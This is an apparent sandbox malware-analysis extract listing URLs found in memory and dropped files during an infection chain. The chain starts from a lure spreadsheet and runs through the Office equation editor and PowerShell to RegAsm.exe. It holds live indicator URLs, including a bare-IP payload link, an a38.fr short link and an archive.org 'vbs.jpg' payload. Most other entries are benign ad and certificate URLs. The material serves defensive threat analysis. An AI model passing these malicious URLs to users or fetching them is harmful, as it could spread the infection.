                Source: EQNEDT32.EXE, 00000009.00000002.444358881.00000000002AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIFj
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.997515162.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.997584693.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: powershell.exe, 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: powershell.exe, 0000000D.00000002.465793095.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                Source: powershell.exe, 0000000B.00000002.469486699.0000000002481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.465020760.0000000002481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000011.00000002.495074136.0000000000859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: RegAsm.exe, 00000011.00000002.494226172.00000000002AC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/0K
                Source: RegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: RegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://www.msn.com/
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                Source: bhvB5B9.tmp.15.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                Source: RegAsm.exe, 0000000F.00000002.497810329.00000000003B4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: RegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: a38.fr.url.4.drString found in binary or memory: https://a38.fr/
                Source: GQ1oBm.url.4.drString found in binary or memory: https://a38.fr/GQ1oBm
                Source: August Shipment - Inv No. 041.xlsString found in binary or memory: https://a38.fr/GQ1oBmJ
                Source: ~DF7D504418A9804062.TMP.0.dr, C9730000.0.drString found in binary or memory: https://a38.fr/GQ1oBmyX
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://contextual.media.net/
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                Source: powershell.exe, 0000000D.00000002.465793095.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000D.00000002.465793095.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000D.00000002.465793095.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: powershell.exe, 0000000D.00000002.465020760.00000000025BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org
                Source: powershell.exe, 0000000D.00000002.465020760.0000000002800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
                Source: powershell.exe, 0000000B.00000002.469486699.00000000025D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240LR
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 0000000D.00000002.465793095.00000000034A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhvB5B9.tmp.15.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
